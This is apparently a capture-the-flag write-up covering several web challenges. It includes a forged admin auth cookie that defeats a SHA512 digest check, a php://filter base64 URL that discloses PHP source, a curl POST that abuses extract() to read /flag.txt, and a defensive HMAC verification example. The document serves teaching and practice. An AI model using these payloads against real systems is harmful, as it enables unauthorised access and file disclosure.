
Agent 95

Change your User-Agent header to the Windows 95 profile and you see the flag.

Official Business

Going to /robots.txt reveals the server source code, along with some authentication checks.

We didn't really do this the intended way.

Set the auth cookie to

auth=7b2275736572223a202261646d696e222c202270617373776f7264223a202270617373222c202261646d696e223a20747275652c2022646967657374223a2022686173686c69622e736861353132287365637265745f6b6579202b206279746573286a736f6e2e64756d707328636f6f6b69652c20736f72745f6b6579733d54727565292c205c2261736369695c2229292e6865786469676573742829227d

which is the encoded form of

{'user': 'admin', 'password': 'pass', 'admin': True, 'digest': 'hashlib.sha512(secret_key + bytes(json.dumps(cookie, sort_keys=True), "ascii")).hexdigest()'}

This makes the SHA512 comparison always true, allowing you to log in as the admin.
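As an added example (not the challenge's server code, which the writeup does not reproduce), this is how a cookie of this layout can be checked so that a client-supplied digest field is never trusted: the digest is recomputed as a keyed HMAC over the canonical sorted-key JSON of the other fields and compared in constant time, so the forged value above is rejected. The secret key and the guest cookie are constructed for the demo; the forged hex value is the one quoted above.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo key; the challenge's real secret_key is not known.
SECRET_KEY = b"constructed-demo-secret"
# The forged cookie value quoted in the writeup above (hex-encoded JSON).
FORGED_COOKIE_HEX = "7b2275736572223a202261646d696e222c202270617373776f7264223a202270617373222c202261646d696e223a20747275652c2022646967657374223a2022686173686c69622e736861353132287365637265745f6b6579202b206279746573286a736f6e2e64756d707328636f6f6b69652c20736f72745f6b6579733d54727565292c205c2261736369695c2229292e6865786469676573742829227d"

def decode_cookie(cookie_hex: str) -> dict:
    """Hex -> ASCII JSON -> dict; raises ValueError on anything malformed."""
    cookie = json.loads(bytes.fromhex(cookie_hex).decode("ascii"))
    if not isinstance(cookie, dict):
        raise ValueError("cookie is not a JSON object")
    return cookie

def sign_cookie(secret_key: bytes, fields: dict) -> str:
    """Keyed HMAC-SHA512 over canonical (sorted-key) JSON of all fields except digest."""
    payload = {k: v for k, v in fields.items() if k != "digest"}
    canonical = json.dumps(payload, sort_keys=True).encode("ascii")
    return hmac.new(secret_key, canonical, hashlib.sha512).hexdigest()

def issue_cookie(secret_key: bytes, fields: dict) -> str:
    """Server side: attach the digest and hex-encode the JSON (same layout as the page's cookie)."""
    signed = dict(fields)
    signed["digest"] = sign_cookie(secret_key, fields)
    return json.dumps(signed).encode("ascii").hex()

def verify_cookie(secret_key: bytes, cookie_hex: str) -> Optional[dict]:
    """Return the fields (minus digest) if the digest checks out, else None.
    The client-supplied digest is never evaluated or trusted; it is only compared,
    in constant time, against a value recomputed from the other fields."""
    try:
        cookie = decode_cookie(cookie_hex)
    except ValueError:
        return None
    presented = cookie.get("digest")
    if not isinstance(presented, str):
        return None
    expected = sign_cookie(secret_key, cookie)
    if not hmac.compare_digest(presented.encode("ascii", "replace"), expected.encode("ascii")):
        return None
    return {k: v for k, v in cookie.items() if k != "digest"}

if __name__ == "__main__":
    # The forged cookie presents source text as its digest, so it is rejected.
    print("forged cookie accepted:", verify_cookie(SECRET_KEY, FORGED_COOKIE_HEX) is not None)
```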

Web

PHPhone Book

Visiting the site, you can see that phphonebook.php is referenced; however, visiting the URL as suggested (/index.php/?file=phphonebook.php) returns a blank page.

There is a trick to get around this: wrap the file in a php://filter stream so that its content is returned base64-encoded rather than executed as PHP, as demonstrated below: /index.php/?file=php://filter/convert.base64-encode/resource=phphonebook.php

This returns the source code (base64-encoded), which contains a very interesting piece of PHP.

extract($_POST);   // every POST parameter becomes a PHP variable of the same name

if (isset($emergency)){   // so any POST body containing "emergency" defines $emergency
    echo(file_get_contents("/flag.txt"));
}

This means that if the POST request contains a parameter named emergency, the server returns the contents of /flag.txt. We did this in two ways, with Burp Suite and with curl, but the curl request was much simpler; all that was needed was: curl -X POST 'http://jh2i.com:50002/index.php/?file=phphonebook.php' -d 'emergency=999' | grep flag

Voila, the flag is returned. A relatively simple challenge, but it was definitely interesting to learn about the base64 filter.

Localghost

Take apart the JavaScript.

In it there is a reference to the flag with some base64 next to it.

Decoding the base64 gives us the flag.